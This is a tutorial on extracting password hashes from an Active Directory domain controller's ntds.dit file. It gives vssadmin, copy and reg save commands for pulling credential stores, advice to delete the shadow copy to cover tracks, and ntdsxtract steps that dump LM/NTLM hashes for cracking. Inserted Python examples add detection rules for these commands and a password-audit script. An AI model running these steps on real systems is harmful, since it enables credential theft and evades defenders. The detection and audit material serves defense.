Extracting Hashes from NTDS.dit File

Once you have privileged access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy, or create a copy if needed. We generally prefer to create a new copy so we know it has the latest information, and we can take the relevant files offline for further cracking. The first thing we need to do is get the ntds.dit file and the SYSTEM file from the Volume Shadow Copy on the domain controller. Luckily, Windows has a built-in tool to assist with collecting the files needed: vssadmin.

We can list the available shadow files by running the following command:

C:\>vssadmin list shadows
# Returns:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
Contents of shadow copy set ID: {xx-xx-xxx-xxx}
   Contained 1 shadow copies at creation time: 6/26/2018 4:26:04 PM

Create a new Volume Shadow Copy of the current drive:

C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
Successfully created shadow copy for 'c:\'
    Shadow Copy ID: {xx-xxx-xxx-x-x}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow Copy:

The path to a file inside the volume shadow copy, followed by the destination, looks similar to the line below:

\\?\GLOBALROOT\Device\<SHADOW COPY DISK>\windows\<directory>\<File> <where to put file>

NOTE: The dot (.) at the end of the copy line will place the file in your current working directory.

NOTE 2: Do not use PowerShell to copy the ntds.dit file.  

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .

Registry Save

It is recommended to also get a current copy of SYSTEM from the registry, just in case. There were times when the SYSTEM file from the shadow copy was corrupt.

reg SAVE HKLM\SYSTEM c:\SYS

Delete the freshly created shadow copy to cover your tracks:

vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
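
Seen from the defender's side, the steps above leave process-creation records on the domain controller. The following added example (not part of the original article) matches the commands shown on this page against logged command lines and triages the hits per host; the event layout, host names and sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns mirror the commands shown on this page (matched case-insensitively).
RULES = {
    "shadow_create": re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I),
    "shadow_delete": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "ntds_from_shadow": re.compile(
        r"HarddiskVolumeShadowCopy\d+\\windows\\ntds\\ntds\.dit", re.I),
    "system_from_shadow": re.compile(
        r"HarddiskVolumeShadowCopy\d+\\windows\\system32\\config\\system\b", re.I),
    "reg_save_system": re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SYSTEM\b", re.I),
}

def match_rules(cmdline):
    """Return the names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(events):
    """'high' = shadow creation or ntds.dit read, plus SYSTEM hive access or shadow deletion."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev["host"]].update(match_rules(ev["cmdline"]))
    verdicts = {}
    for host, seen in hits.items():
        if not seen:
            continue  # host only ran commands no rule cares about
        staging = seen & {"shadow_create", "ntds_from_shadow"}
        follow_up = seen & {"system_from_shadow", "reg_save_system", "shadow_delete"}
        verdicts[host] = ("high" if staging and follow_up else "review", sorted(seen))
    return verdicts

# Constructed sample events; host names are made up for this example.
SAMPLE_EVENTS = [
    {"host": "DC01", "cmdline": r"vssadmin create shadow /for=c:"},
    {"host": "DC01", "cmdline":
        r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ."},
    {"host": "DC01", "cmdline": r"reg SAVE HKLM\SYSTEM c:\SYS"},
    {"host": "DC01", "cmdline": r"vssadmin delete shadows /for=c: /quiet"},
    {"host": "DC02", "cmdline": r"vssadmin create shadow /for=d:"},
    {"host": "FS02", "cmdline": r"vssadmin list shadows"},
]

if __name__ == "__main__":
    for host, (severity, rules) in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, severity, ", ".join(rules))
```

Because copy is a cmd.exe built-in, it only shows up in process-creation logs (Event ID 4688 with command-line auditing, or Sysmon Event ID 1) when launched as cmd.exe /c; vssadmin.exe and reg.exe always appear as their own processes, so those rules carry most of the weight.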

Now that you have the files on your host, it is time to get the hashes.

Utilities needed:

  • libesedb
  • ntdsxtract

libesedb

Download libesedb:

git clone https://github.com/libyal/libesedb.git
cd libesedb/
./synclibs.sh
#Install the following packages:
apt install autoconf automake autopoint libtool pkg-config
./autogen.sh
./configure
make
make install

Running esedbexport to extract ntds.dit data:

./esedbexport -t <Directory to export data to (.export will be added to the end)> <ntds.dit file>

EXAMPLE:

# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409
Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:

git clone https://github.com/csababarta/ntdsxtract.git

Usage for dsusers.py
DSUsers v1.3.3 - Extracts information related to user objects

# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> --passwordhashes --lmoutfile <LM OUT FILE> --ntoutfile <NTLM OUT FILE> --pwdformat john --syshive <SYSTEM FILE>

(Add --passwordhistory to get previous hashes for each user; the number of hashes will vary based on the domain settings for password history)

Example Output in JTR Format

# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP --passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM
[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john
The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initializing engine…
[+] Loading saved map files (Stage 1)…
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map'
[+] Rebuilding maps…
[+] Scanning database – 100% -> 40933 records processed
[+] Sanity checks…
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information – 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)…
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps…
[+] Extracting object links…
List of users:

(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-xxx
SID: S-1-5-21-350xxx
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
    NORMAL_ACCOUNT
Ancestors:
    $ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
    name:$NT$2c8f14b9xxx:::
    name:e4c3436ddd1xxx:::

(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
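
For a password audit, the findings that matter in these files are accounts with a blank password, accounts sharing a password, and accounts that still store an LM hash. The following added example (not part of the original article or of ntdsxtract) reports all three; it assumes the name:[$NT$]hash::: layout shown in the sample output above, and every account name and hash other than the two well-known empty-value hashes is constructed.

```python
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM value meaning "no LM hash stored"

def parse_john(lines):
    """Yield (account, hash) from 'name:[$NT$]hash:::' lines; skip malformed or redacted ones."""
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 2 or not parts[0]:
            continue
        digest = parts[1].lower()
        if digest.startswith("$nt$"):
            digest = digest[4:]
        if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            yield parts[0], digest

def audit(nt_lines, lm_lines):
    """Summarise audit findings from the NT and LM output files."""
    by_hash = defaultdict(list)
    for account, digest in parse_john(nt_lines):
        by_hash[digest].append(account)
    return {
        "blank_password": sorted(by_hash.get(EMPTY_NT, [])),
        "shared_password": sorted(
            sorted(accts) for h, accts in by_hash.items() if len(accts) > 1 and h != EMPTY_NT),
        "lm_hash_stored": sorted(a for a, d in parse_john(lm_lines) if d != EMPTY_LM),
    }

# Constructed sample content standing in for NT.out and LM.out.
SAMPLE_NT = [
    "alice:$NT$0123456789abcdef0123456789abcdef:::",
    "bob:$NT$0123456789abcdef0123456789abcdef:::",
    "svc_print:$NT$31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "carol:$NT$fedcba9876543210fedcba9876543210:::",
    "broken line",
]
SAMPLE_LM = [
    "alice:aad3b435b51404eeaad3b435b51404ee:::",
    "carol:00112233445566778899aabbccddeeff:::",
]

if __name__ == "__main__":
    for finding, accounts in audit(SAMPLE_NT, SAMPLE_LM).items():
        print(finding, accounts)
```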